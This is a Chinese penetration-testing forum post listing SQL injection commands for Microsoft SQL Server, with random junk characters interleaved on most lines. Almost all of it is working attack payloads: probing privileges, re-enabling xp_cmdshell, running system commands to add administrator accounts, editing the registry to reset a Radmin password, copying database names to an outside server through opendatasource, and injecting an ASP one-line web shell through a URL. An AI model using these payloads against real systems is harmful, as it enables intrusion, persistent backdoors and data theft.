找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 阿D常用的一些注入命令
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1760|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
阿D常用的一些注入命令
+ z. L& n! o$ z) d9 z+ _//看看是什么权限的6 b# |2 L& N+ @; \! W$ n% B" n
and 1=(Select IS_MEMBER('db_owner'))6 a& Y- Z7 S* \8 _$ w7 z" C7 X
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
; G: O) M! f% I! X4 X/ r5 k* N" c, Q9 z0 F) e+ K) z8 w1 {4 v' ^
//检测是否有读取某数据库的权限' B# [7 L8 m$ V7 v
and 1= (Select HAS_DBACCESS('master'))) ~( [- B& f. N+ ^3 Y4 V7 S
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --# s' D# s! c) W6 x4 C! T

9 a3 {& R3 l6 ]- j2 n# [: Z) Y' E5 H( a$ D. L* T. o  Q8 [3 |6 z
数字类型
3 X# B+ w% F, D9 I$ H: Eand char(124)%2Buser%2Bchar(124)=06 y& h' k2 M8 K4 a

2 x3 _; V7 R2 Q2 U  P字符类型
+ S9 g- {$ B; f$ [: @' and char(124)%2Buser%2Bchar(124)=0 and ''='( F$ I& a8 I8 F

& K8 a. _& T. v搜索类型% s4 ]$ r1 W' V+ l* Z9 n
' and char(124)%2Buser%2Bchar(124)=0 and '%'='; Z5 W% n: p4 o3 y/ k8 k6 P- G
- H& Y% n1 d) X. @9 C( O
爆用户名( d- _: F/ d" x- Z# s0 w5 Y" n
and user>09 O+ j2 n- r, ~& l1 |; s2 j. p
' and user>0 and ''='  q# @& m4 {1 D9 a$ }

; z" X% l1 T" @! s' p5 A检测是否为SA权限
$ f$ I, p8 _* }and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
: r- A2 F4 d2 l! r' pAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --5 K9 H+ Y1 Y4 ~$ |7 V( n

, ]+ k, C5 w/ w1 G. g7 w% R检测是不是MSSQL数据库
# ]- H! y8 g4 b9 R# [% rand exists (select * from sysobjects);-- 2 E$ G  o& ~: m! i' i- @
) y$ H- Y( s- O& A
检测是否支持多行: [& |; S! i# @5 `9 S
;declare @d int;--
8 b; O6 ^$ k7 F9 j8 H- i6 r: z+ N" h) Y$ ?5 A. g
恢复 xp_cmdshell7 N, V9 b* K5 D7 M3 `/ E
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--/ N0 C" D  h, d0 ?! `9 u; u  \

  G4 u$ s; D8 U! }  N1 V* ^8 u
* U1 P; n0 h; Z: E& d1 Y$ c) Rselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
4 H% s7 R  L2 ~0 }- _4 V/ D! E, \- D$ N/ \& t2 [
//-----------------------
: u4 ]/ ]: X3 L! ^9 A//      执行命令: y" {6 i1 i* x6 M
//-----------------------
" p( P5 A; U1 [/ v, ]/ q7 A6 p首先开启沙盘模式:
* |5 d* n! L6 G( B- s3 sexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1. v7 ]; o+ k9 S4 f0 ?+ X' S/ f
- T" T3 g! X- j& h  Y8 M$ ^5 Y# b; `, |
然后利用jet.oledb执行系统命令
7 _3 Y" Y6 S+ D& _& h! s- O" Wselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")'): ~" M0 r+ S1 }. D$ i! U: l
; ~3 l5 P( o8 G: ]
执行命令# v2 G. M" Q. F7 l, s( x* Z* n2 t5 n
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--! Z) F0 d1 `6 C& v4 r5 t' A

; b$ B& e2 _/ QEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'* X" V, k2 y! t2 e$ Y

, N  }! }# O% m8 @判断xp_cmdshell扩展存储过程是否存在:
% ]+ f* ?+ r: w4 x' M. A) jhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
: n/ b3 P' i8 D: C8 f: f2 R4 B- ]/ Y/ U5 G1 s. T" y
写注册表
; c1 o$ I* ~4 h$ c8 b; Bexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',10 G9 ]0 G. ?8 d' G- D, }* L

5 a6 h0 k; y+ h" u' ?8 oREG_SZ! \+ q9 h7 n) R# W0 x2 H& w) ~6 p

* U2 n* {1 e" d1 _读注册表
5 H/ Q/ G6 |- u6 W( bexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'8 G  f$ S% o# E2 k1 L. {

  Q+ o) u$ r+ q* s. S读取目录内容
: R" U0 R1 A3 f6 y3 \) \( p) iexec master..xp_dirtree 'c:\winnt\system32\',1,1" [, t7 ^& o* v+ I0 M" f7 Q, r. W

8 f. d- P3 f; ]) B0 C; g9 n; O1 h. t) O4 A
数据库备份% X' r3 D6 H0 y9 r1 ]4 ^9 ^
backup database pubs to disk = 'c:\123.bak'
4 {- Z; r. F% x! `8 M0 Y# B0 o: _
//爆出长度: x) @9 i7 u0 m. w6 W% V
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--* L; v6 m: [; T
3 H8 T6 u8 ^  t- g9 b- _- X

9 T; o9 o$ H* R9 a+ C
2 }8 F$ n; G# O5 D; n6 g* i更改sa口令方法:用sql综合利用工具连接后,执行命令:
6 p; f3 g  S( T8 P0 Kexec sp_password NULL,'新密码','sa'% k, |; I% X1 _$ {/ N. t6 p" l9 U# t

/ y# N" ]2 _+ U- R% ?4 u& ?3 ]  }1 f添加和删除一个SA权限的用户test:$ h/ j% S! u5 ?" m
exec master.dbo.sp_addlogin test,ptlove  ]0 F6 F, G' U% {8 X: T4 O( Y2 b
exec master.dbo.sp_addsrvrolemember test,sysadmin
, Q/ K2 ^2 |# {0 u: j
  x. ~& l  k6 `删除扩展存储过过程xp_cmdshell的语句: 8 r" [+ [; G- }1 k4 B
exec sp_dropextendedproc 'xp_cmdshell'- C3 A3 J7 n. P- l
* u, \1 o6 i% q: `! ?- N$ [
添加扩展存储过过程0 q( b6 \1 t* w4 Q; g$ M. u
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' 8 \* `& S9 L) ?6 E, u
GRANT exec On xp_proxiedadata TO public 8 z( r+ P% M" l% p" Z. `( E* v3 A
7 G. E, f( r. T  u
9 `  ]) x/ N) T: p" c
停掉或激活某个服务。 : j, f# j1 z, _0 z
1 v. M1 P3 @3 V* F
exec master..xp_servicecontrol 'stop','schedule'6 H0 h8 X) n4 z; _
exec master..xp_servicecontrol 'start','schedule'
! f" D: l# w/ A2 \% r/ N
' y0 h6 w6 r0 |" U  |% K; bdbo.xp_subdirs. N  j7 G6 O; G; W" g' P! V( \7 n3 w, g

8 X1 ?# Y* b7 D: g3 I5 [/ z只列某个目录下的子目录。7 N2 t0 m6 N  D2 p8 W3 ^
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'3 \( _9 g4 Q' ~0 K  P( I: d
) T5 {" M$ K3 X2 B2 x" U
dbo.xp_makecab
: E9 T) ]- \9 Z+ J$ w  N* V% l/ w/ B( g
将目标多个档案压缩到某个目标档案之内。
0 U+ s3 e* w- t, Q9 Q所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。" k  b& w# ^) s& U. p8 [- K9 i
3 A3 |: K3 ~7 n; l
dbo.xp_makecab. T2 R6 n% |$ `0 W) H: b
'c:\test.cab','mszip',1,
' f9 h. e' p; F* k0 g% O# l'C:\Inetpub\wwwroot\SQLInject\login.asp',9 g* b& M( P0 G9 @9 N( F
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
/ X3 a; O: _, [" z- ^; F1 m6 e4 N3 c
xp_terminate_process
, v) ^- i: J5 F, g
7 |8 ~1 m" O/ U9 l# m停掉某个执行中的程序,但赋予的参数是 Process ID。1 ~$ m% S$ u+ i; U& p; z& ^
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID# o" }- }4 p8 P; S
! l1 i% ^& {4 j# A' Q2 g
xp_terminate_process 2484
3 B+ s% f2 e: K; I4 ?0 D
$ B0 R! l, u$ k) F: @xp_unpackcab
. C  R: g- T* I  \* U
* w, H' [5 `4 U) V) F/ N# D, M0 R解开压缩档。8 h5 s, k( R1 c

2 u% `" r) ]' k+ Z+ R4 w" Cxp_unpackcab 'c:\test.cab','c:\temp',1' S+ k8 K% Y: D! Z! s( e7 E
, u- R4 Z  J, R( L7 N( X$ g$ l

( T4 `9 ], P( c6 Y某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
- v1 x  H# J& d
' S: l- R* Y2 Q1 v9 x7 ccreate database lcx;3 U9 \! `' v. b( k4 p8 }! `6 n
Create TABLE ku(name nvarchar(256) null);
2 _7 l' ]; W' t! j0 }6 U( ]Create TABLE biao(id int NULL,name nvarchar(256) null);
7 U9 Y7 U+ h9 j- x$ c" n* f$ h  L2 o) v
//得到数据库名& f8 r& y1 m, W- G
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
* T9 x& ]  m: c. d, P
; T6 B8 l8 }" t; b2 `0 [
7 K$ @7 C8 k+ ]; C! u, A# Q/ s0 @. x//在Master中创建表,看看权限怎样; c/ T1 f9 ]* ]* `
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
( }  H& s- q$ h5 A  i
- ]( f/ d4 e" F( q) y+ y" v用 sp_makewebtask直接在web目录里写入一句话马:: z- _8 ~& @5 l
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
$ o& Y  v5 k' E4 \* J# ^% |; P6 j; ?# C+ Y* l/ I
//更新表内容. Y- g% x7 U6 V! `+ X  r: a
Update films SET kind = 'Dramatic' Where id = 123$ Q( l" G/ |$ [
5 P  D8 C1 I. ~( p
//删除内容+ L' [; Q7 S5 z% ^9 X  ]
delete from table_name where Stockid = 3
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表